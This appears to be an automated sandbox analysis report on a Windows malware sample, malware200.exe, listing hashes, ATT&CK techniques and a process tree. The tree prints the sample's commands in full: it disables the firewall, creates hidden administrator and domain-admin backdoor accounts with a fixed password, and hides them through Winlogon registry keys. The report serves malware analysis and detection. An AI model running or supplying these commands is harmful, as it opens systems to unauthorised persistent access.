ae1dab47fae0307831ec90b249d26ab4d783fd1fbfebf98a2448d40932885bbd

Resubmissions

31/08/2023, 12:31

230831-pp5gasef7w 9

31/08/2023, 12:09

230831-pbznwsfa54 10

Analysis

max time kernel
51s
max time network
20s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
31/08/2023, 12:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

malware200.exe
Size

448KB
MD5

957302c7e0c9e025397c2e3cfdc0fef3
SHA1

10ac72a20ac5cd28c94199899fe2eae6ed5b3a84
SHA256

ae1dab47fae0307831ec90b249d26ab4d783fd1fbfebf98a2448d40932885bbd
SHA512

e1443c86e1acb84c5ecb80db5ecca931882478bfdc792c99875eef93b028ba169433dfa2fea8c7a6ee78a3792108172fb8d2e41103a76c77f8d67ee967948ebc
SSDEEP

12288:oquErHF6xC9D6DmR1J98w4oknqOOCyQf1vYOUlsxd:prl6kD68JmlotQfhHUl4

Score

9^/10

evasion persistence

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Modifies Windows Firewall 1 TTPs 3 IoCs

evasion

Windows Service

T1543.003

pid	Process
2848	netsh.exe
2836	netsh.exe
2484	netsh.exe

Modifies WinLogon 2 TTPs 5 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\software\Wow6432Node\microsoft\windows nt\currentversion\winlogon\specialaccounts\userlist	malware200.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\specialaccounts	malware200.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\specialaccounts\userlist	malware200.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\specialaccounts\userlist\AstNet = "0"	malware200.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\specialaccounts\userlist\server_sys = "0"	malware200.exe

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/memory/1952-8-0x0000000000B70000-0x0000000000C7C000-memory.dmp	autoit_exe
behavioral1/memory/1952-9-0x0000000000B70000-0x0000000000C7C000-memory.dmp	autoit_exe
behavioral1/memory/1952-12-0x0000000000B70000-0x0000000000C7C000-memory.dmp	autoit_exe

Runs net.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1220	WMIC.exe
Token: SeSecurityPrivilege	1220	WMIC.exe
Token: SeTakeOwnershipPrivilege	1220	WMIC.exe
Token: SeLoadDriverPrivilege	1220	WMIC.exe
Token: SeSystemProfilePrivilege	1220	WMIC.exe
Token: SeSystemtimePrivilege	1220	WMIC.exe
Token: SeProfSingleProcessPrivilege	1220	WMIC.exe
Token: SeIncBasePriorityPrivilege	1220	WMIC.exe
Token: SeCreatePagefilePrivilege	1220	WMIC.exe
Token: SeBackupPrivilege	1220	WMIC.exe
Token: SeRestorePrivilege	1220	WMIC.exe
Token: SeShutdownPrivilege	1220	WMIC.exe
Token: SeDebugPrivilege	1220	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1220	WMIC.exe
Token: SeRemoteShutdownPrivilege	1220	WMIC.exe
Token: SeUndockPrivilege	1220	WMIC.exe
Token: SeManageVolumePrivilege	1220	WMIC.exe
Token: 33	1220	WMIC.exe
Token: 34	1220	WMIC.exe
Token: 35	1220	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1220	WMIC.exe
Token: SeSecurityPrivilege	1220	WMIC.exe
Token: SeTakeOwnershipPrivilege	1220	WMIC.exe
Token: SeLoadDriverPrivilege	1220	WMIC.exe
Token: SeSystemProfilePrivilege	1220	WMIC.exe
Token: SeSystemtimePrivilege	1220	WMIC.exe
Token: SeProfSingleProcessPrivilege	1220	WMIC.exe
Token: SeIncBasePriorityPrivilege	1220	WMIC.exe
Token: SeCreatePagefilePrivilege	1220	WMIC.exe
Token: SeBackupPrivilege	1220	WMIC.exe
Token: SeRestorePrivilege	1220	WMIC.exe
Token: SeShutdownPrivilege	1220	WMIC.exe
Token: SeDebugPrivilege	1220	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1220	WMIC.exe
Token: SeRemoteShutdownPrivilege	1220	WMIC.exe
Token: SeUndockPrivilege	1220	WMIC.exe
Token: SeManageVolumePrivilege	1220	WMIC.exe
Token: 33	1220	WMIC.exe
Token: 34	1220	WMIC.exe
Token: 35	1220	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1760	WMIC.exe
Token: SeSecurityPrivilege	1760	WMIC.exe
Token: SeTakeOwnershipPrivilege	1760	WMIC.exe
Token: SeLoadDriverPrivilege	1760	WMIC.exe
Token: SeSystemProfilePrivilege	1760	WMIC.exe
Token: SeSystemtimePrivilege	1760	WMIC.exe
Token: SeProfSingleProcessPrivilege	1760	WMIC.exe
Token: SeIncBasePriorityPrivilege	1760	WMIC.exe
Token: SeCreatePagefilePrivilege	1760	WMIC.exe
Token: SeBackupPrivilege	1760	WMIC.exe
Token: SeRestorePrivilege	1760	WMIC.exe
Token: SeShutdownPrivilege	1760	WMIC.exe
Token: SeDebugPrivilege	1760	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1760	WMIC.exe
Token: SeRemoteShutdownPrivilege	1760	WMIC.exe
Token: SeUndockPrivilege	1760	WMIC.exe
Token: SeManageVolumePrivilege	1760	WMIC.exe
Token: 33	1760	WMIC.exe
Token: 34	1760	WMIC.exe
Token: 35	1760	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1760	WMIC.exe
Token: SeSecurityPrivilege	1760	WMIC.exe
Token: SeTakeOwnershipPrivilege	1760	WMIC.exe
Token: SeLoadDriverPrivilege	1760	WMIC.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
1952	malware200.exe
1952	malware200.exe
1952	malware200.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
1952	malware200.exe
1952	malware200.exe
1952	malware200.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1952 wrote to memory of 320	1952	malware200.exe	28
PID 1952 wrote to memory of 320	1952	malware200.exe	28
PID 1952 wrote to memory of 320	1952	malware200.exe	28
PID 1952 wrote to memory of 320	1952	malware200.exe	28
PID 1952 wrote to memory of 2232	1952	malware200.exe	29
PID 1952 wrote to memory of 2232	1952	malware200.exe	29
PID 1952 wrote to memory of 2232	1952	malware200.exe	29
PID 1952 wrote to memory of 2232	1952	malware200.exe	29
PID 1952 wrote to memory of 2600	1952	malware200.exe	31
PID 1952 wrote to memory of 2600	1952	malware200.exe	31
PID 1952 wrote to memory of 2600	1952	malware200.exe	31
PID 1952 wrote to memory of 2600	1952	malware200.exe	31
PID 1952 wrote to memory of 2204	1952	malware200.exe	33
PID 1952 wrote to memory of 2204	1952	malware200.exe	33
PID 1952 wrote to memory of 2204	1952	malware200.exe	33
PID 1952 wrote to memory of 2204	1952	malware200.exe	33
PID 2204 wrote to memory of 2360	2204	net.exe	36
PID 2204 wrote to memory of 2360	2204	net.exe	36
PID 2204 wrote to memory of 2360	2204	net.exe	36
PID 2204 wrote to memory of 2360	2204	net.exe	36
PID 320 wrote to memory of 2848	320	cmd.exe	37
PID 320 wrote to memory of 2848	320	cmd.exe	37
PID 320 wrote to memory of 2848	320	cmd.exe	37
PID 320 wrote to memory of 2848	320	cmd.exe	37
PID 2600 wrote to memory of 2836	2600	cmd.exe	38
PID 2600 wrote to memory of 2836	2600	cmd.exe	38
PID 2600 wrote to memory of 2836	2600	cmd.exe	38
PID 2600 wrote to memory of 2836	2600	cmd.exe	38
PID 2232 wrote to memory of 2484	2232	cmd.exe	39
PID 2232 wrote to memory of 2484	2232	cmd.exe	39
PID 2232 wrote to memory of 2484	2232	cmd.exe	39
PID 2232 wrote to memory of 2484	2232	cmd.exe	39
PID 1952 wrote to memory of 2732	1952	malware200.exe	40
PID 1952 wrote to memory of 2732	1952	malware200.exe	40
PID 1952 wrote to memory of 2732	1952	malware200.exe	40
PID 1952 wrote to memory of 2732	1952	malware200.exe	40
PID 2732 wrote to memory of 2728	2732	net.exe	42
PID 2732 wrote to memory of 2728	2732	net.exe	42
PID 2732 wrote to memory of 2728	2732	net.exe	42
PID 2732 wrote to memory of 2728	2732	net.exe	42
PID 1952 wrote to memory of 2820	1952	malware200.exe	43
PID 1952 wrote to memory of 2820	1952	malware200.exe	43
PID 1952 wrote to memory of 2820	1952	malware200.exe	43
PID 1952 wrote to memory of 2820	1952	malware200.exe	43
PID 2820 wrote to memory of 2700	2820	net.exe	45
PID 2820 wrote to memory of 2700	2820	net.exe	45
PID 2820 wrote to memory of 2700	2820	net.exe	45
PID 2820 wrote to memory of 2700	2820	net.exe	45
PID 1952 wrote to memory of 2764	1952	malware200.exe	46
PID 1952 wrote to memory of 2764	1952	malware200.exe	46
PID 1952 wrote to memory of 2764	1952	malware200.exe	46
PID 1952 wrote to memory of 2764	1952	malware200.exe	46
PID 2764 wrote to memory of 2316	2764	net.exe	48
PID 2764 wrote to memory of 2316	2764	net.exe	48
PID 2764 wrote to memory of 2316	2764	net.exe	48
PID 2764 wrote to memory of 2316	2764	net.exe	48
PID 1952 wrote to memory of 2392	1952	malware200.exe	51
PID 1952 wrote to memory of 2392	1952	malware200.exe	51
PID 1952 wrote to memory of 2392	1952	malware200.exe	51
PID 1952 wrote to memory of 2392	1952	malware200.exe	51
PID 2392 wrote to memory of 2744	2392	net.exe	53
PID 2392 wrote to memory of 2744	2392	net.exe	53
PID 2392 wrote to memory of 2744	2392	net.exe	53
PID 2392 wrote to memory of 2744	2392	net.exe	53

C:\Users\Admin\AppData\Local\Temp\malware200.exe
"C:\Users\Admin\AppData\Local\Temp\malware200.exe"
1⤵
- Modifies WinLogon
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1952
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh firewall set opmode Disable
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:320
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode Disable
    3⤵
    - Modifies Windows Firewall
    PID:2848
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall set currentprofile state off
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2232
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set currentprofile state off
    3⤵
    - Modifies Windows Firewall
    PID:2484
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2600
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:2836
- C:\Windows\SysWOW64\net.exe
  net user AstNet h3lp12desk /expires:never /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2204
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 user AstNet h3lp12desk /expires:never /add
    3⤵
    PID:2360
- C:\Windows\SysWOW64\net.exe
  net localgroup administrators AstNet /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2732
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 localgroup administrators AstNet /add
    3⤵
    PID:2728
- C:\Windows\SysWOW64\net.exe
  net localgroup "remote desktop users" AstNet /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2820
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 localgroup "remote desktop users" AstNet /add
    3⤵
    PID:2700
- C:\Windows\SysWOW64\net.exe
  net group "domain admins" AstNet /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2764
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 group "domain admins" AstNet /add
    3⤵
    PID:2316
- C:\Windows\SysWOW64\net.exe
  net user AstNet /active:yes
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2392
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 user AstNet /active:yes
    3⤵
    PID:2744
- C:\Windows\SysWOW64\net.exe
  net user AstNet /expires:never
  2⤵
  PID:2516
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 user AstNet /expires:never
    3⤵
    PID:2288
- C:\Windows\SysWOW64\net.exe
  net user AstNet h3lp12desk
  2⤵
  PID:2396
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 user AstNet h3lp12desk
    3⤵
    PID:2692
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /C "wmic path Win32_UserAccount where Name="AstNet" set PasswordExpires=false"
  2⤵
  PID:2796
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic path Win32_UserAccount where Name="AstNet" set PasswordExpires=false
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1220
- C:\Windows\SysWOW64\net.exe
  net user server_sys h3lp12desk /expires:never /add
  2⤵
  PID:1808
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 user server_sys h3lp12desk /expires:never /add
    3⤵
    PID:2952
- C:\Windows\SysWOW64\net.exe
  net localgroup administrators server_sys /add
  2⤵
  PID:1092
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 localgroup administrators server_sys /add
    3⤵
    PID:2412
- C:\Windows\SysWOW64\net.exe
  net localgroup "remote desktop users" server_sys /add
  2⤵
  PID:2188
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 localgroup "remote desktop users" server_sys /add
    3⤵
    PID:2024
- C:\Windows\SysWOW64\net.exe
  net group "domain admins" server_sys /add
  2⤵
  PID:1468
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 group "domain admins" server_sys /add
    3⤵
    PID:436
- C:\Windows\SysWOW64\net.exe
  net user server_sys /active:yes
  2⤵
  PID:1640
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 user server_sys /active:yes
    3⤵
    PID:472
- C:\Windows\SysWOW64\net.exe
  net user server_sys /expires:never
  2⤵
  PID:1012
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 user server_sys /expires:never
    3⤵
    PID:2332
- C:\Windows\SysWOW64\net.exe
  net user server_sys h3lp12desk
  2⤵
  PID:2032
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 user server_sys h3lp12desk
    3⤵
    PID:1272
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /C "wmic path Win32_UserAccount where Name="server_sys" set PasswordExpires=false"
  2⤵
  PID:1572
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic path Win32_UserAccount where Name="server_sys" set PasswordExpires=false
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1760

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:2444

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1952-8-0x0000000000B70000-0x0000000000C7C000-memory.dmp

Filesize
1.0MB

Download
memory/1952-9-0x0000000000B70000-0x0000000000C7C000-memory.dmp

Filesize
1.0MB

Download
memory/1952-0-0x0000000000B70000-0x0000000000C7C000-memory.dmp

Filesize
1.0MB

Download
memory/1952-12-0x0000000000B70000-0x0000000000C7C000-memory.dmp

Filesize
1.0MB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads